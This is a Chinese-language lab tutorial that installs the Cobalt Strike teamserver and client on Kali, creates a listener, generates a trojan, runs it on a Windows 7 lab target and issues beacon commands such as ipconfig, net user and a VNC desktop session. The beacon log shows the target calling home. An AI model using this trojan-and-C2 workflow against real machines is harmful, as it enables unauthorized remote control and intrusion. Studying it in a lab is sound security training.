本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。
Cobalt Strike是一款渗透测试神器,Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,主要是为了方便一个渗透团队内部能够及时共享所有成员的渗透信息,加强成员间的交流协作,提高渗透效率,可被团队进行分布式协团操作。Cobalt Strike是一款以metasploit为基础的GUI的框框架式渗透工具,Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
环境准备:
| 名称 | 系统 | 位数 | IP | 
| CS 服务端 / 客户端 | Kali Linux | 64 | 10.3.0.231 | 
| 靶机 | Windows 7 | 64 | 10.3.0.234 | 
一、安装服务端
1、下载
https://download.csdn.net/download/mshxuyi/890047572、安装
# 解压
unzip cobaltstrike4.3.zip# 切换安装目录
cd /opt/cobaltstrike4.3# 修改权限
chmod 777 teamserver3、 运行
nohup ./teamserver 10.3.0.231 admin@123 > logs.info 2>&1 &4、查看,CS服务是50050端口
└─# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      661/sshd: /usr/sbin 
tcp6       0      0 :::3389                 :::*                    LISTEN      659/xrdp            
tcp6       0      0 ::1:3350                :::*                    LISTEN      620/xrdp-sesman     
tcp6       0      0 :::50050                :::*                    LISTEN      3770309/java        
tcp6       0      0 :::80                   :::*                    LISTEN      3770309/java        
tcp6       0      0 :::22                   :::*                    LISTEN      661/sshd: /usr/sbin 
二、运行客户端
1、本例还是在 Kali 中运行,注意因为要打开界面,所以在SSH下面不行,我们可以远程桌面到Kail,然后再运行

2、切换到 CS 目录,运行
sh start.sh3、弹出连接界面,输入上面设置的密码 admin@123

三、创建监听器
1、创建监听器

2、点击最下面 Add

四、创建木马
1、创建攻击木马

2、选择上面创建的监听器

3、保存木马文件

4、创建木马链接

5、选择木马位置与生成的文件名

6、把生成的木马链接在 靶机上面运行

五、靶机运行木马
1、靶机下载木马并运行

六、CS服务端查看靶机上线
1、可以看到靶机已经上线了

2、进入靶机

3、成功出现命令行

4、查看靶机IP和用户
beacon> shell ipconfig# 输出
[*] Tasked beacon to run: ipconfig
[+] host called home, sent: 39 bytes
[+] received output:Windows IP 配置以太网适配器 本地连接:连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::8c47:ccd9:f10f:1b8b%11IPv4 地址 . . . . . . . . . . . . : 10.3.0.234子网掩码  . . . . . . . . . . . . : 255.255.255.0默认网关. . . . . . . . . . . . . : 10.3.0.1隧道适配器 isatap.{28F326C2-E31B-42B2-B03F-F2E07F5FAD84}:媒体状态  . . . . . . . . . . . . : 媒体已断开连接特定的 DNS 后缀 . . . . . . . :beacon> net user# 输出
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 105073 bytes
[+] received output:
Users for \\localhost:Administrator (admin)
Guest
tomma
5、查看靶机桌面
beacon> desktop# 输出
[+] host called home, sent: 16 bytes
[*] Tasked beacon to spawn VNC server
[+] host called home, sent: 374794 bytes
[+] started port forward on 7146 to 127.0.0.1:7146
